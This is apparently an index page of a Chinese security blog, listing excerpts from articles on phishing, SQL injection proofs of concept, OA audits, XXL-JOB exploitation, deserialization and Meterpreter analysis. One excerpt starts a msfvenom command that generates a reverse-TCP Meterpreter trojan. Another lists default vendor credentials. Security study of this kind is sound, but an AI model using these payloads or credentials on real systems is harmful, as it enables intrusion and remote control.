By: 耀 事件背景 近日,慢雾安全团队和 Rabby Wallet 团队发现一种利用 Google 广告进行钓鱼的攻击手法。随后,慢雾安全团队联合 Rabby Wallet 团队对该攻击手法展开深入...
03月05日31 views评论地址
钓鱼
钓鱼揭秘之谷歌虚假广告钓鱼
03月05日31 views评论地址
钓鱼
03月05日31 views评论地址
钓鱼
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使...
03月04日91 views评论sql注入漏洞
漏洞复现
1day | 红帆OA系统审计
一、 概述 红帆OA代码如下: 查看登录Login.asp,如下: 文件的后端代码在ioffice.dll 中的Unilogin这个类中。 在bin文件中把全部的DLL反编译,定位到ioffice中的...
03月04日165 views评论deskto
io
干货 | XXL-JOB在真实攻防下的总结
前言 最近在HW中经常会遇到XXL-JOB这个组件,也通过这个组件进入了不少目标单位,那就对该组件的利用进行一次总结。 一、最基本的操作-计划任务命令执行 这个操作我相信大家已经熟的不能再熟了,因为x...
03月04日155 views评论io
job
【技巧】开源情报调查从哪里开始-10个切入点
开始在线调查时,您的第一个问题通常是“我从哪里开始?” 当调查一条内容或信息或来源时,这将取决于您的“切入点”——您拥有的第一条信息。 随着经验的积累,事情会变得更容易,但为了提供帮助,本文提供了一组...
02月10日44 views评论io
邮箱
Facebook代码执行实现命令注入敏感信息泄露
部分网站开设编码练习,若安全配置不当,则代码执行将升级为操作系统命令注入,导致敏感信息泄露等。 信息泄露 facebookrecruiting.com是 Facebook 用于招聘的网站,其网站页面存...
02月08日16 views评论inputstream
io
数据库攻防学习
免责声明 本文仅供学习和研究使用,请勿使用文中的技术用于非法用途,任何人造成的任何负面影响,与本号及作者无关。 Redis 0x01 redis学习 在渗透测试面试或者网络安全面试中可能会常问redi...
01月02日34 views评论io
redis
一篇入门java反序列化漏洞
一篇入门java反序列化漏洞 在探索一个技术时,我们经常会遇到众多资源和文章,但并非所有的内容都是用户友好或深入浅出的。尽管网络上关于某些主题的文章众多,但很多往往缺乏细致的解释和深入的理解。仅仅通过...
12月27日45 views评论反序列化
序列化
浅谈IP地址溯源方法
CVES实验室 “CVES实验室”(www.cves.io)由团队旗下SRC组与渗透组合并而成,专注于漏洞挖掘、渗透测试与情报分析等方向。近年来我们报...
12月04日92 views评论cn
威胁情报
各大厂商常用的弱口令集合
Oms呼叫中心 KXTsoft2010 Glodon控制台 admin TRENDnet趋势网络摄像头 admin/admin MOBOTIX-视频监控 admin/meinsm 思科Cisco 没有...
11月24日安全百科54 views评论io
walle
realloc函数应用&IO泄露体验
本题主要介绍realloc函数,平时我们使用realloc最多便是在打malloc_hook-->onegadget的时候,使用realloc_hook调整onegadget的栈帧,从而gets...
10月17日9 views评论io
ptr
Meterpreter源码分析
一、生成木马上线msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.245.129 LPORT=4444 > /home/rkabyss...
09月24日73 views评论net
payload
12